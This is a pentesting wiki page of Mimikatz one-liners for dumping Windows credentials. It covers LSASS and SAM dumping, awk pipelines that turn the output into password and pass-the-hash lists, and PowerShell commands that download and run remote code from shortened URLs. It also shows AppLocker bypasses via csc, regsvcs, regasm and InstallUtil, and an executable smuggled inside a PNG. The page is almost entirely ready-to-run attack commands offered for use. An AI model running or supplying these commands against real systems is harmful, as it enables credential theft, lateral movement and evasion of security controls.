MimiKatz

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

One-liner to dump logonpasswords and hashes to mimikatz.log

mimikatz.exe log "privilege::debug" "sekurlsa::logonPasswords"  "token::elevate" "lsadump::sam" exit


list of all usernames with domains and passwords from mimikatz.log

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($12)>2) print $8 "\\" $4 ":" $12}'|sort -u

ACME\john.smith:Myl0ngP@ssword jira.acme.com\john.smith@acme.com:Myj1raP@ssword

list of all usernames and passwords without the domain

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; getline; print user " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($8)>2) print $4 ":" $8}'|sort -u

john.smith:Myl0ngP@ssword john.smith@acme.com:Myj1raP@ssword

list of all usernames and NTLM hashes ready for use with pth

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* Password\|Microsoft_OC1"|awk '{if (length($12)>2) print $8 "/" $4 "%aad3b435b51404eeaad3b435b51404ee:" $12}'|sort -u

ACME/john.smith%aad3b435b51404eeaad3b435b51404ee:1acd1a77416c50969d66867cd1e27e91


Mimikatz totally loading in memory

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Mimikatz Applocker whitelist bypass .NET 2.X

First off you need admin privs, secondly run powershell and paste this to create a key.snk:

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:TEMP\key.snk -Value $Content -Encoding Byte

then run this oneline and watch the cleartext passwords rain

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://is.gd/iNnAge','%temp%\katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v2.* && csc.exe /r:System.EnterpriseServices.dll /out:%temp%\katz.exe /keyfile:%temp%\key.snk /unsafe %temp%\katz.cs && regsvcs.exe %temp%\katz.exe && regasm.exe %temp%\katz.exe log privilege::debug sekurlsa::logonpasswords


Mimikatz from a base64 encoded .png file

  • need to be admin user, paste this whole line in cmd prompt and hit enter
powershell
$url = 'https://2.bp.blogspot.com/-7I8duTC1gCo/VfDuQ_Ax-kI/AAAAAAAAAT8/03qXhXigYRw/s1600/skullkatz.png'
$request = New-Object System.Net.WebCLient
$bytes = $request.DownloadData($url)
$b64 = [System.Text.Encoding]::ASCII.GetString($bytes, 9343, $bytes.Length - 9343)
$realdeal = [System.Convert]::FromBase64String($b64);
[io.file]::WriteAllBytes('c:\windows\temp\skull.exe',$realdeal)
exit
c:\windows\temp\skull.exe log privilege::debug sekurlsa::logonpasswords

or this oneliner

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://is.gd/ra66Ok','skullkatz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:skullkatz.exe skullkatz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U skullkatz.exe 
privilege::debug 
sekurlsa::logonpasswords


bypass

powershell -noprofile -executionpolicy bypass -command "&{. .\Invoke-Mimikatz.ps1;Invoke-Mimikatz}"


Grab Passwords from LSASS Memory Dump

use procdump:

procdump -accepteula -ma lsass.exe lsass.dmp

transfer back to attacking computer and run mimikatz

mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : ‘e:\lsass.dmp’
mimikatz # sekurlsa::logonPasswords